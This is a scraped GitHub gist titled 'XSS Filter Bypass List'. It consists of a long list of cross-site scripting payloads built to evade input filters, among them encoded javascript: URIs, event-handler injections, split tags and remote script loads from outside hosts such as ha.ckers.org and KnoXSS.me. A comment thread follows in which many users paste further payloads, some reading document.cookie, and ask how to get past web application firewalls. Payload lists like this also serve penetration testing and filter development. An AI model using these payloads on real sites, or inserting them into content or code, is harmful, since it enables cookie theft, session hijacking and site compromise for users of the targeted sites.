Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
XSS Filter Bypass List
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"<XSS>=&{()}
0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
<script/src=data:,alert()>
<marquee/onstart=alert()>
<video/poster/onerror=alert()>
<isindex/autofocus/onfocus=alert()>
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
<a onmouseover="alert(document.cookie)">xxs link</a>
<a onmouseover=alert(document.cookie)>xxs link</a>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC=# onmouseover="alert('xxs')">
<IMG SRC= onmouseover="alert('xxs')">
<IMG onmouseover="alert('xxs')">
<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>
<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;
&#39;&#88;&#83;&#83;&#39;&#41;>
<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&
#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
<IMG SRC="jav ascript:alert('XSS');">
<IMG SRC="jav&#x09;ascript:alert('XSS');">
<IMG SRC="jav&#x0A;ascript:alert('XSS');">
<IMG SRC="jav&#x0D;ascript:alert('XSS');">
<IMG SRC=" &#14; javascript:alert('XSS');">
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<<SCRIPT>alert("XSS");//<</SCRIPT>
<SCRIPT SRC=http://ha.ckers.org/xss.js?< B >
<SCRIPT SRC=//ha.ckers.org/.j>
<IMG SRC="javascript:alert('XSS')"
<iframe src=http://ha.ckers.org/scriptlet.html <
\";alert('XSS');//
</script><script>alert('XSS');</script>
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
<BODY BACKGROUND="javascript:alert('XSS')">
<IMG DYNSRC="javascript:alert('XSS')">
<IMG LOWSRC="javascript:alert('XSS')">
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br>
<IMG SRC='vbscript:msgbox("XSS")'>
<IMG SRC="livescript:[code]">
<BODY ONLOAD=alert('XSS')>
<BGSOUND SRC="javascript:alert('XSS');">
<BR SIZE="&{alert('XSS')}">
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">
<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
exp/*<A STYLE='no\xss:noxss("*//*");
xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
<XSS STYLE="xss:expression(alert('XSS'))">
<XSS STYLE="behavior: url(xss.htc);">
¼script¾alert(¢XSS¢)¼/script¾
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
<TABLE BACKGROUND="javascript:alert('XSS')">
<TABLE><TD BACKGROUND="javascript:alert('XSS')">
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
<DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))">
<DIV STYLE="width: expression(alert('XSS'));">
<!--[if gte IE 4]><SCRIPT>alert('XSS');</SCRIPT><![endif]-->
<BASE HREF="javascript:alert('XSS');//">
<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
<!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'"-->
<? echo('<SCR)';echo('IPT>alert("XSS")</SCRIPT>'); ?>
<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<A HREF="http://66.102.7.147/">XSS</A>
0\"autofocus/onfocus=alert(1)--><video/poster/ error=prompt(2)>"-confirm(3)-"
veris-->group<svg/onload=alert(/XSS/)//
#"><img src=M onerror=alert('XSS');>
element[attribute='<img src=x onerror=alert('XSS');>
[<blockquote cite="]">[" onmouseover="alert('RVRSH3LL_XSS');" ]
%22;alert%28%27RVRSH3LL_XSS%29//
javascript:alert%281%29;
<w contenteditable id=x onfocus=alert()>
alert;pg("XSS")
<svg/onload=%26%23097lert%26lpar;1337)>
<script>for((i)in(self))eval(i)(1)</script>
<scr<script>ipt>alert(1)</scr</script>ipt><scr<script>ipt>alert(1)</scr</script>ipt>
<sCR<script>iPt>alert(1)</SCr</script>IPt>
<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=">test</a>
@ninja25538

This comment has been minimized.

Copy link

@ninja25538 ninja25538 commented Aug 8, 2017

Nice!, Thanks!

@Walidhossain010

This comment has been minimized.

Copy link

@Walidhossain010 Walidhossain010 commented Oct 12, 2017

which worked most??

@Cache-Bounty

This comment has been minimized.

Copy link

@Cache-Bounty Cache-Bounty commented Apr 6, 2018

test

@CesBear

This comment has been minimized.

Copy link

@CesBear CesBear commented May 8, 2018

cool

@xeno6696

This comment has been minimized.

Copy link

@xeno6696 xeno6696 commented May 10, 2018

@Noob-Walid: It's doubtful that any of these are going to "work" right out of the box. You'll want to use a fuzzer against a suspected form field, and see what tag types even partially "make it through." Though, all of these inputs are available at OWASP, and actually are also available from both fuzzdb and SecLists in text files that contain the name "rsnake."

As a matter of fact, all of you should just clone those repos.

@0xINT3

This comment has been minimized.

Copy link

@0xINT3 0xINT3 commented Sep 1, 2018

many don't even work. websites are getting smart. :/

@sittminzaw

This comment has been minimized.

Copy link

@sittminzaw sittminzaw commented Sep 5, 2018

"autofocus/onfocus=alert(`Bug´)-->
also work

@IvanGuGon1

This comment has been minimized.

Copy link

@IvanGuGon1 IvanGuGon1 commented Jan 1, 2019

<SCRIPT>document.write("PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
@ghost

This comment has been minimized.

Copy link

@ghost ghost commented Jan 26, 2019

@ghost

This comment has been minimized.

Copy link

@ghost ghost commented Jan 26, 2019

rip github xss protection

@ghost

This comment has been minimized.

Copy link

@ghost ghost commented Jan 26, 2019

here, sons. <img src = x onerror = alert( document.cookies ) >

@ghost

This comment has been minimized.

Copy link

@ghost ghost commented Jan 26, 2019

start with > and without the spaces

@ghost

This comment has been minimized.

Copy link

@ghost ghost commented Jan 26, 2019

fuck

@ghost

This comment has been minimized.

Copy link

@ghost ghost commented Jan 26, 2019

<h1>no</h1>

@ghost

This comment has been minimized.

Copy link

@ghost ghost commented Jan 26, 2019

no

@shamrocksu88

This comment has been minimized.

Copy link

@shamrocksu88 shamrocksu88 commented Feb 1, 2019

KNOX

@shamrocksu88

This comment has been minimized.

Copy link

@shamrocksu88 shamrocksu88 commented Feb 1, 2019

KNOX

@shamrocksu88

This comment has been minimized.

Copy link

@shamrocksu88 shamrocksu88 commented Feb 1, 2019

S05PWA==

@shamrocksu88

This comment has been minimized.

Copy link

@shamrocksu88 shamrocksu88 commented Feb 1, 2019

PDFLTk9YPDE=

@shamrocksu88

This comment has been minimized.

Copy link

@shamrocksu88 shamrocksu88 commented Feb 1, 2019

'"KNOX

@shamrocksu88

This comment has been minimized.

Copy link

@shamrocksu88 shamrocksu88 commented Feb 1, 2019

KNOX\

@shamrocksu88

This comment has been minimized.

Copy link

@shamrocksu88 shamrocksu88 commented Feb 1, 2019

confirmK

@shamrocksu88

This comment has been minimized.

Copy link

@shamrocksu88 shamrocksu88 commented Feb 1, 2019

(confirm)(1)

@shamrocksu88

This comment has been minimized.

Copy link

@shamrocksu88 shamrocksu88 commented Feb 1, 2019

'-confirmK-'

@shamrocksu88

This comment has been minimized.

Copy link

@shamrocksu88 shamrocksu88 commented Feb 1, 2019

"-confirmK-"

@shamrocksu88

This comment has been minimized.

Copy link

@shamrocksu88 shamrocksu88 commented Feb 1, 2019

${(confirm)(1)}

@shamrocksu88

This comment has been minimized.

Copy link

@shamrocksu88 shamrocksu88 commented Feb 1, 2019

1</Script/"'--><Svg /OnLoad=appendChild(createElement(Script)).src=https://KnoXSS.me\x2F00?1=6243>

@nizeman72

This comment has been minimized.

Copy link

@nizeman72 nizeman72 commented Feb 12, 2019

<sCR<script>iPt>alert(1)</SCr</script>IPt>

@nizeman72

This comment has been minimized.

Copy link

@nizeman72 nizeman72 commented Feb 12, 2019

iji

@nizeman72

This comment has been minimized.

Copy link

@nizeman72 nizeman72 commented Feb 12, 2019

<SCRIPT>document.write("PT SRC="http://ha.ckers.org/xss.js"</SCRIPT>
@nizeman72

This comment has been minimized.

Copy link

@nizeman72 nizeman72 commented Feb 12, 2019

<script>document.write("PT SRC="http://ha.ckers.org/xss.js"></script>
@nizeman72

This comment has been minimized.

Copy link

@nizeman72 nizeman72 commented Feb 12, 2019

<script>document.write("pt src="http://ha.ckers.org/xss.js"></script>
@nizeman72

This comment has been minimized.

Copy link

@nizeman72 nizeman72 commented Feb 12, 2019

<script>document.write("pt src="http://ha.ckers.org/xss.js"</script>
@nizeman72

This comment has been minimized.

Copy link

@nizeman72 nizeman72 commented Feb 12, 2019

<img src=xonerror=alert( document.cookies)>

@nizeman72

This comment has been minimized.

Copy link

@nizeman72 nizeman72 commented Feb 12, 2019

<img src = x onerror = alert( document.cookies ) >

@nizeman72

This comment has been minimized.

Copy link

@nizeman72 nizeman72 commented Feb 12, 2019

<scr<script>ipt>alert(1)</scr</script>ipt><scr<script>ipt>alert(1)</scr</script>ipt>

@nizeman72

This comment has been minimized.

Copy link

@nizeman72 nizeman72 commented Feb 12, 2019

</Script/"'--><Svg /OnLoad=appendChild(createElement(Script)).src=https://KnoXSS.me\x2F00?1=6243>

@nizeman72

This comment has been minimized.

Copy link

@nizeman72 nizeman72 commented Feb 12, 2019

</Script/"'--><Svg /OnLoad=appendChild(createElement(Script)).src=`https://KnoXSS.me\x2F00?1=6243</script>

@nizeman72

This comment has been minimized.

Copy link

@nizeman72 nizeman72 commented Feb 12, 2019

</Script/"'--><Svg /OnLoad=appendChild(createElement(Script)).src=https://KnoXSS.me\x2F00?1=6243>

@nizeman72

This comment has been minimized.

Copy link

@nizeman72 nizeman72 commented Feb 12, 2019

@nizeman72

This comment has been minimized.

Copy link

@nizeman72 nizeman72 commented Feb 16, 2019

Lol

@nizeman72

This comment has been minimized.

Copy link

@nizeman72 nizeman72 commented Feb 16, 2019

test

@nizeman72

This comment has been minimized.

Copy link

@nizeman72 nizeman72 commented Feb 16, 2019

<script>alert(fuck)</script>
@Yashin2134

This comment has been minimized.

Copy link

@Yashin2134 Yashin2134 commented Feb 22, 2019

@Yashin2134

This comment has been minimized.

Copy link

@Yashin2134 Yashin2134 commented Feb 22, 2019

Skip to content
Search…
All gists
Back to GitHub
New gist
@Yashin2134
187
68 @rvrsh3llrvrsh3ll/xxsfilterbypass.lst
Last active 2 days ago •

<script src="https://gist.github.com/rvrsh3ll/09a8b933291f9f98e8ec.js"></script>

Code Revisions 4 Stars 187 Forks 68
XSS Filter Bypass List
xxsfilterbypass.lst
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"=&{()}
0"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
<script/src=data:,alert()>
<marquee/onstart=alert()>
<video/poster/onerror=alert()>
<isindex/autofocus/onfocus=alert()>

<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>

xxs link xxs link

<SCRIPT>alert("XSS")</SCRIPT>">

@Yashin2134

This comment has been minimized.

Copy link

@Yashin2134 Yashin2134 commented Feb 22, 2019

<SCRIPT>alert("XSS")</SCRIPT>">

@wlanpsk

This comment has been minimized.

Copy link

@wlanpsk wlanpsk commented Mar 28, 2019

Mmm

@EDMPL

This comment has been minimized.

Copy link

@EDMPL EDMPL commented Apr 1, 2019

test

@EDMPL

This comment has been minimized.

Copy link

@EDMPL EDMPL commented Apr 1, 2019

nice

@s04v

This comment has been minimized.

Copy link

@s04v s04v commented Apr 9, 2019

Test

@itayze

This comment has been minimized.

Copy link

@itayze itayze commented Apr 13, 2019

<IMG SRC=&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#97&
#108&#101&#114&#116&#40&#39&#88&#83&#83&#39&#41>

@ABCyborg25

This comment has been minimized.

Copy link

@ABCyborg25 ABCyborg25 commented Apr 15, 2019

Hi All,

I am new to InfoSec and need a small help from you dignitaries

While performing XSS what if my web aplication Firewall is blocking certain words like Alert, Script etc.

TIA for your answers!

@m1lw0rm

This comment has been minimized.

Copy link

@m1lw0rm m1lw0rm commented Apr 16, 2019

@m1lw0rm

This comment has been minimized.

Copy link

@m1lw0rm m1lw0rm commented Apr 16, 2019

@T3ap0T

This comment has been minimized.

Copy link

@T3ap0T T3ap0T commented Apr 18, 2019

rofl xss in the comments
plz

@UnknownUserG

This comment has been minimized.

Copy link

@UnknownUserG UnknownUserG commented Apr 26, 2019

Prompt('XSS') can be used in place of Alert('XSS') if the alert keyword is blocked

@r3dx00

This comment has been minimized.

Copy link

@r3dx00 r3dx00 commented Apr 28, 2019

Markdown allows bold txt and e.t.c, why y'all flexing ?

@yeamplow-com

This comment has been minimized.

Copy link

@yeamplow-com yeamplow-com commented May 7, 2019

AAA

@yeamplow-com

This comment has been minimized.

Copy link

@yeamplow-com yeamplow-com commented May 7, 2019

AAA

@yeamplow-com

This comment has been minimized.

Copy link

@yeamplow-com yeamplow-com commented May 7, 2019

AAA

@yeamplow-com

This comment has been minimized.

Copy link

@yeamplow-com yeamplow-com commented May 7, 2019

AAA

@yeamplow-com

This comment has been minimized.

Copy link

@yeamplow-com yeamplow-com commented May 7, 2019

AAA

@yeamplow-com

This comment has been minimized.

Copy link

@yeamplow-com yeamplow-com commented May 7, 2019

s

@yeamplow-com

This comment has been minimized.

Copy link

@yeamplow-com yeamplow-com commented May 7, 2019

s

@yeamplow-com

This comment has been minimized.

Copy link

@yeamplow-com yeamplow-com commented May 7, 2019

a

@yeamplow-com

This comment has been minimized.

Copy link

@yeamplow-com yeamplow-com commented May 7, 2019

a

@yeamplow-com

This comment has been minimized.

Copy link

@yeamplow-com yeamplow-com commented May 7, 2019

a

@yeamplow-com

This comment has been minimized.

Copy link

@yeamplow-com yeamplow-com commented May 7, 2019

a

@Sachin-hodkasia

This comment has been minimized.

Copy link

@Sachin-hodkasia Sachin-hodkasia commented May 9, 2019

"><img src=x onerror=confirm(12);

@DrShrox

This comment has been minimized.

Copy link

@DrShrox DrShrox commented Jun 25, 2019

a

@DrShrox

This comment has been minimized.

Copy link

@DrShrox DrShrox commented Jun 25, 2019

<script>alert("xss")</script>
@DrShrox

This comment has been minimized.

Copy link

@DrShrox DrShrox commented Jun 25, 2019

@darkness203

This comment has been minimized.

Copy link

@darkness203 darkness203 commented Jun 28, 2019

';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"=&{()}
0"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
<script/src=data:,alert()>
<marquee/onstart=alert()>
<video/poster/onerror=alert()>
<isindex/autofocus/onfocus=alert()>

<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>

xxs link xxs link

<SCRIPT>alert("XSS")</SCRIPT>">

@realarrch

This comment has been minimized.

Copy link

@realarrch realarrch commented Jul 1, 2019

TEST

@aniruddhmistry

This comment has been minimized.

Copy link

@aniruddhmistry aniruddhmistry commented Aug 25, 2019

test">

@captain99hook

This comment has been minimized.

Copy link

@captain99hook captain99hook commented Sep 2, 2019

@captain99hook

This comment has been minimized.

Copy link

@captain99hook captain99hook commented Sep 2, 2019

No description provided.

@captain99hook

This comment has been minimized.

Copy link

@captain99hook captain99hook commented Sep 2, 2019

No description provided.

@REHAAAM

This comment has been minimized.

Copy link

@REHAAAM REHAAAM commented Sep 16, 2019

<SCRIPT>alert("XSS")</SCRIPT>">
@REHAAAM

This comment has been minimized.

Copy link

@REHAAAM REHAAAM commented Sep 16, 2019

hkora"<

@REHAAAM

This comment has been minimized.

Copy link

@REHAAAM REHAAAM commented Sep 16, 2019

<SCRIPT>alert("XSS")</SCRIPT>">
@Vishnugadupudi

This comment has been minimized.

Copy link

@Vishnugadupudi Vishnugadupudi commented Oct 21, 2019

<font/color=blue>vishnu

@yeamplow-com

This comment has been minimized.

Copy link

@yeamplow-com yeamplow-com commented Oct 22, 2019

@yeamplow-com

This comment has been minimized.

Copy link

@yeamplow-com yeamplow-com commented Oct 22, 2019

[AAA](';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"=&{()}
0"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
<script/src=data:,alert()>
<marquee/onstart=alert()>
<video/poster/onerror=alert()>
<isindex/autofocus/onfocus=alert()>

<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>

xxs link xxs link

<SCRIPT>alert("XSS")</SCRIPT>">

@yeamplow-com

This comment has been minimized.

Copy link

@yeamplow-com yeamplow-com commented Oct 22, 2019

';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"=&{()}
0"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
<script/src=data:,alert()>
<marquee/onstart=alert()>
<video/poster/onerror=alert()>
<isindex/autofocus/onfocus=alert()>

<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>

xxs link xxs link

<SCRIPT>alert("XSS")</SCRIPT>">

@yeamplow-com

This comment has been minimized.

Copy link

@yeamplow-com yeamplow-com commented Oct 22, 2019

@yeamplow-com

This comment has been minimized.

Copy link

@yeamplow-com yeamplow-com commented Oct 22, 2019

#"><img src=M onerror=alert('XSS');>

@yeamplow-com

This comment has been minimized.

Copy link

@yeamplow-com yeamplow-com commented Oct 22, 2019

<IMG """><SCRIPT>alert("XSS")</SCRIPT>">


<IMG SRC= onmouseover="alert('xxs')">

@yeamplow-com

This comment has been minimized.

Copy link

@yeamplow-com yeamplow-com commented Oct 22, 2019

<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME> [
[" onmouseover="alert('RVRSH3LL_XSS');" ]
@yeamplow-com

This comment has been minimized.

Copy link

@yeamplow-com yeamplow-com commented Oct 22, 2019

<IMG SRC= onmouseover="alert('xxs')">

@yeamplow-com

This comment has been minimized.

Copy link

@yeamplow-com yeamplow-com commented Oct 22, 2019

@yeamplow-com

This comment has been minimized.

Copy link

@yeamplow-com yeamplow-com commented Oct 22, 2019

@yeamplow-com

This comment has been minimized.

Copy link

@yeamplow-com yeamplow-com commented Oct 22, 2019

<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>
@yeamplow-com

This comment has been minimized.

Copy link

@yeamplow-com yeamplow-com commented Oct 22, 2019

@yeamplow-com

This comment has been minimized.

Copy link

@yeamplow-com yeamplow-com commented Oct 22, 2019

<>
<IMG SRC= onmouseover="alert('xxs')">
<>

@yeamplow-com

This comment has been minimized.

Copy link

@yeamplow-com yeamplow-com commented Oct 22, 2019

<IMG SRC= onmouseover="alert('xxs')">

@yeamplow-com

This comment has been minimized.

Copy link

@yeamplow-com yeamplow-com commented Oct 22, 2019

@yeamplow-com

This comment has been minimized.

Copy link

@yeamplow-com yeamplow-com commented Oct 22, 2019

<">
<IMG SRC= onmouseover="alert('xxs')">

@yeamplow-com

This comment has been minimized.

Copy link

@yeamplow-com yeamplow-com commented Oct 22, 2019

@yeamplow-com

This comment has been minimized.

Copy link

@yeamplow-com yeamplow-com commented Oct 22, 2019

<IMG #>
<IMG SRC= onmouseover="alert('xxs')">

@yeamplow-com

This comment has been minimized.

Copy link

@yeamplow-com yeamplow-com commented Oct 22, 2019

src=#
<IMG SRC= onmouseover="alert('xxs')">

@yeamplow-com

This comment has been minimized.

Copy link

@yeamplow-com yeamplow-com commented Oct 22, 2019

@yeamplow-com

This comment has been minimized.

Copy link

@yeamplow-com yeamplow-com commented Oct 22, 2019

<SRC=#>
<IMG SRC= onmouseover="alert('xxs')">

@yeamplow-com

This comment has been minimized.

Copy link

@yeamplow-com yeamplow-com commented Oct 22, 2019

IMGSRC=#
<IMG SRC= onmouseover="alert('xxs')">

@yeamplow-com

This comment has been minimized.

Copy link

@yeamplow-com yeamplow-com commented Oct 22, 2019

IMG SRC=#
<IMG SRC= onmouseover="alert('xxs')">

@yeamplow-com

This comment has been minimized.

Copy link

@yeamplow-com yeamplow-com commented Oct 22, 2019

<IMG SRC=#
IMG SRC= onmouseover="alert('xxs')">

@yeamplow-com

This comment has been minimized.

Copy link

@yeamplow-com yeamplow-com commented Oct 22, 2019

@yeamplow-com

This comment has been minimized.

Copy link

@yeamplow-com yeamplow-com commented Oct 22, 2019

@yeamplow-com

This comment has been minimized.

Copy link

@yeamplow-com yeamplow-com commented Oct 22, 2019


onmouseover="alert('xxs')">
@yeamplow-com

This comment has been minimized.

Copy link

@yeamplow-com yeamplow-com commented Oct 22, 2019


onmouseover="alert('xxs')">
@yeamplow-com

This comment has been minimized.

Copy link

@yeamplow-com yeamplow-com commented Oct 22, 2019

@yeamplow-com

This comment has been minimized.

Copy link

@yeamplow-com yeamplow-com commented Oct 22, 2019

@yeamplow-com

This comment has been minimized.

Copy link

@yeamplow-com yeamplow-com commented Oct 22, 2019

@yeamplow-com

This comment has been minimized.

Copy link

@yeamplow-com yeamplow-com commented Oct 22, 2019

@yeamplow-com

This comment has been minimized.

Copy link

@yeamplow-com yeamplow-com commented Oct 22, 2019

@yeamplow-com

This comment has been minimized.

Copy link

@yeamplow-com yeamplow-com commented Oct 22, 2019

<IMG SRC=>

@yeamplow-com

This comment has been minimized.

Copy link

@yeamplow-com yeamplow-com commented Oct 22, 2019

@yeamplow-com

This comment has been minimized.

Copy link

@yeamplow-com yeamplow-com commented Oct 22, 2019

@yeamplow-com

This comment has been minimized.

Copy link

@yeamplow-com yeamplow-com commented Oct 22, 2019

@yeamplow-com

This comment has been minimized.

Copy link

@yeamplow-com yeamplow-com commented Oct 22, 2019

@yeamplow-com

This comment has been minimized.

Copy link

@yeamplow-com yeamplow-com commented Oct 22, 2019

@yeamplow-com

This comment has been minimized.

Copy link

@yeamplow-com yeamplow-com commented Oct 22, 2019

<IMG SRC=https:google.com

@yeamplow-com

This comment has been minimized.

Copy link

@yeamplow-com yeamplow-com commented Oct 22, 2019

@yeamplow-com

This comment has been minimized.

Copy link

@yeamplow-com yeamplow-com commented Oct 22, 2019

@yeamplow-com

This comment has been minimized.

Copy link

@yeamplow-com yeamplow-com commented Oct 22, 2019

@yeamplow-com

This comment has been minimized.

Copy link

@yeamplow-com yeamplow-com commented Oct 22, 2019

@yeamplow-com

This comment has been minimized.

Copy link

@yeamplow-com yeamplow-com commented Oct 22, 2019

@yeamplow-com

This comment has been minimized.

Copy link

@yeamplow-com yeamplow-com commented Oct 22, 2019

@yeamplow-com

This comment has been minimized.

Copy link

@yeamplow-com yeamplow-com commented Oct 22, 2019

@yeamplow-com

This comment has been minimized.

Copy link

@yeamplow-com yeamplow-com commented Oct 22, 2019

No description provided.

@yeamplow-com

This comment has been minimized.

Copy link

@yeamplow-com yeamplow-com commented Oct 22, 2019

No description provided.

@yeamplow-com

This comment has been minimized.

Copy link

@yeamplow-com yeamplow-com commented Oct 22, 2019

@yeamplow-com

This comment has been minimized.

Copy link

@yeamplow-com yeamplow-com commented Oct 22, 2019

@yeamplow-com

This comment has been minimized.

Copy link

@yeamplow-com yeamplow-com commented Oct 22, 2019

@javascript : alert(1)

@yeamplow-com

This comment has been minimized.

Copy link

@yeamplow-com yeamplow-com commented Oct 22, 2019

@javascriptalert(1)

@yeamplow-com

This comment has been minimized.

Copy link

@yeamplow-com yeamplow-com commented Oct 22, 2019

@javascriptalert

@Lazydev10

This comment has been minimized.

Copy link

@Lazydev10 Lazydev10 commented Dec 13, 2019

@Lazydev10

This comment has been minimized.

Copy link

@Lazydev10 Lazydev10 commented Dec 13, 2019

@Lazydev10

This comment has been minimized.

Copy link

@Lazydev10 Lazydev10 commented Dec 13, 2019

@Lazydev10

This comment has been minimized.

Copy link

@Lazydev10 Lazydev10 commented Dec 13, 2019

@Lazydev10

This comment has been minimized.

Copy link

@Lazydev10 Lazydev10 commented Dec 13, 2019

@Lazydev10

This comment has been minimized.

Copy link

@Lazydev10 Lazydev10 commented Dec 13, 2019

@Lazydev10

This comment has been minimized.

Copy link

@Lazydev10 Lazydev10 commented Dec 13, 2019

@Lazydev10

This comment has been minimized.

Copy link

@Lazydev10 Lazydev10 commented Dec 13, 2019

@Lazydev10

This comment has been minimized.

Copy link

@Lazydev10 Lazydev10 commented Dec 13, 2019

qwe

@Lazydev10

This comment has been minimized.

Copy link

@Lazydev10 Lazydev10 commented Dec 13, 2019

xss

@Lazydev10

This comment has been minimized.

Copy link

@Lazydev10 Lazydev10 commented Dec 13, 2019

nice

@Lazydev10

This comment has been minimized.

Copy link

@Lazydev10 Lazydev10 commented Dec 13, 2019

<script language="php">echo phpinfo();</script>
@Lazydev10

This comment has been minimized.

Copy link

@Lazydev10 Lazydev10 commented Dec 13, 2019

qwe

@YudTam

This comment has been minimized.

Copy link

@YudTam YudTam commented Jan 14, 2020

</script><script>alert('XSS');</script>

@YudTam

This comment has been minimized.

Copy link

@YudTam YudTam commented Jan 14, 2020

hehe

@YudTam

This comment has been minimized.

@MrHackIT

This comment has been minimized.

Copy link

@MrHackIT MrHackIT commented Jan 15, 2020

GREAT WORK
Helped A Lot
ThankYOU

@yassinek3ch

This comment has been minimized.

Copy link

@yassinek3ch yassinek3ch commented Jan 23, 2020

<style>

@YudTam

This comment has been minimized.

Copy link

@YudTam YudTam commented Jan 23, 2020

@agungfirdaus18

This comment has been minimized.

Copy link

@agungfirdaus18 agungfirdaus18 commented Feb 4, 2020

lol

@agungfirdaus18

This comment has been minimized.

Copy link

@agungfirdaus18 agungfirdaus18 commented Feb 4, 2020

link

@agungfirdaus18

This comment has been minimized.

Copy link

@agungfirdaus18 agungfirdaus18 commented Feb 4, 2020

